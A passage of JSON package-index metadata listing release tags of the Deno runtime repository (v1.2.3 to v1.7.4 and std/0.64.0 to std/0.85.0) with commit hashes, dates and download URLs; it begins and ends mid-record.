no/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/ta